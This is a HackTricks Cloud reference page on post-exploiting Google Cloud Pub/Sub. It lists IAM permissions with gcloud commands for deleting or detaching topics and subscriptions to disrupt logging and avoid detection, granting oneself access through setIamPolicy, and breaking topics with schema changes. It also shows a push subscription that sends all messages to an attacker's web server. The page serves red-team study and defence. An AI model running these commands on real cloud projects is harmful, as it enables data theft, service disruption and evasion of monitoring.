HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Pub/Sub Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Pub/Sub

For more information about Pub/Sub check the following page:

pageGCP - Pub/Sub Enum

pubsub.topics.publish

Publish a message in a topic, useful to send unexpected data and trigger unexpected functionalities or exploit vulnerabilities:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Useful to prevent a subscription from receiving messages, maybe to avoid detection.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Useful to prevent a subscription from receiving messages, maybe to avoid detection. It's possible to delete a topic even with subscriptions attached to it.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Use this permission to update some setting of the topic to disrupt it, like --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Give yourself permission to perform any of the previous attacks.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Get all the messages in a web server:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Create a subscription and use it to pull messages:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Delete a subscription could be useful to disrupt a log processing system or something similar:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.

pubsub.subscriptions.setIamPolicy

Give yourself the permissions needed to perform any of the previously commented attacks.

pubsub.schemas.delete

Delete a schema to be able to send messages that doesn't fulfil with the schema:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted. If there aren't any schemas you might need to create one.

schema.json
{
    "namespace": "com.example",
    "type": "record",
    "name": "Person",
    "fields": [
        {
            "name": "name",
            "type": "string"
        },
        {
            "name": "age",
            "type": "int"
        }
    ]
}
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
    --schema=projects/<project-name>/schemas/<topic-id> \
    --message-encoding=json

pubsub.schemas.setIamPolicy

Give yourself the permissions needed to perform any of the previously commented attacks.

pubsub.snapshots.create, pubsub.snapshots.seek

This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
    --subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
    --snapshot=YOUR_SNAPSHOT_NAME
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousGCP - Monitoring Post ExploitationNextGCP - Secretmanager Post Exploitation

Last updated